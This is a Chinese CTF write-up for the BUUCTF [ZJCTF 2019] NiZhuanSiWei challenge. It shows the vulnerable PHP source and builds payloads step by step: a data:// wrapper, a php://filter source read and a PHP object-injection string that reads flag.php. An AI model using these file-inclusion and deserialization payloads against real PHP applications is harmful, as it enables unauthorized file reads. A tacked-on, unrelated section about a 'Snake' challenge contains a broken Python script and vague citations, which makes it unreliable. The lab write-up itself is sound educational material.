buuctf-web- [ZJCTF 2019]NiZhuanSiWei-wp

本文详细介绍了如何利用PHP的file_get_contents函数与data伪协议来执行代码,以及通过构造序列化内容来绕过限制读取特定文件。首先,通过data伪协议设置text参数为特定base64编码的字符串,然后使用filter读取资源并base64编码文件内容。最后,通过unserialize函数构造序列化数据,读取并解码useless.php中的flag。整个过程涉及了PHP的安全漏洞利用与编码技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[ZJCTF 2019]NiZhuanSiWei

知识点

  • data伪协议放置内容( php5.2.0后),通常用来执行php代码
  • file协议读取文件
  • 构造序列化内容

过程

主页就是源代码

<?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

第一个if

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))
  • 传入一个get型参数text
  • text的内容是要得是 welcome to the zjctf

我们使用data伪协议(通常用来执行php代码),我们也可以将内容写入data协议中,让file_get_contents函数取读取。

使用base64加密一气呵成

text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

#附上没有加密的
text=data://text/plain,welcome to the zjctf

第二个if

if(preg_match("/flag/",$file))

看以看到不能直接读取flag

采用filter来读源码,结合base64编码

file=php://filter/read=convert.base64-encode/resource=useless.php

第三个要构造序列化内容

$password = $_GET["password"];
include($file);  //useless.php
$password = unserialize($password);
echo $password;

先查看useless.php源码

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php

得到一串base64串,解密得到源码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-X2938dVp-1627112883193)(C:/Users/Polaris/AppData/Roaming/Typora/typora-user-images/image-20210724153901393.png)]

<?php  
class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>  

构造序列化内容

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

payload:

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

### BUUCTF Snake 题目分析 在BUUCTF的misc类别中,涉及snake主题的题目通常会结合密码学基础、隐写术以及一些常见的编码技巧。以下是基于已知引用内容和专业知识对该类题目的解答方法。 #### 1. 密钥推导 根据已有信息,“anaconda”被提及作为某个cipher的密钥[^1]。这表明,在解决此类问题时,需要关注歌曲名称或其他线索中的关键词是否可以转化为加密算法所需的密钥。例如,如果题目提供了音频文件或者提示了某种动物(如蛇),则应尝试将其映射到可能的字符串形式,并测试其作用于常见加密技术的效果。 #### 2. 工具应用 对于涉及到图像或压缩包隐藏信息的情况,《BUUCTF misc 解题记录》提到使用`outguess`工具较少见但有效[^2]。此软件主要用于提取嵌入图片内的秘密消息;因此当面对`.jpg`, `.png`等形式的数据载体时可考虑运用该程序来查找潜在payloads。 #### 3. Python脚本实现逆向操作 从另一篇wp文档得知存在一段python代码用于计算flag值[^3]: ```python import binascii m = [0x410A4335494A0942, 0x0B0EF2F50BE619F0, 0x4F0A3A064A35282B] enc = "********CENSORED********" flag = b"" for i in range(3): p = enc[i*8:(i+1)*8] # 取每组8字节长度的部分 a = binascii.b2a_hex(p[::-1].encode('utf-8')) # 转换为十六进制表示后再反转顺序 temp_sum = int(a, base=16) + m[i] # 加上对应的偏移量M_i result_bytes = hex(temp_sum)[2:].rjust(len(a), '0').decode('hex')[::-1] # 处理最终结果恢复原始排列方向 flag += result_bytes print(flag.decode()) ``` 上述代码片段展示了如何通过给定参数列表`m[]`逐步还原出完整的FLAG串。它先按固定步长分割待解码序列,再逐一对各部分执行特定变换运算直至获得明文输出。 #### 4. 特殊字符处理 最后值得注意的是某些情况下特殊符号也可能成为干扰因素之一。“Nss shop”的例子说明即使看似简单的括号位置差异都可能导致完全不同的解析路径[^4]。所以在实际动手之前务必仔细阅读全部描述以免遗漏重要细节。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值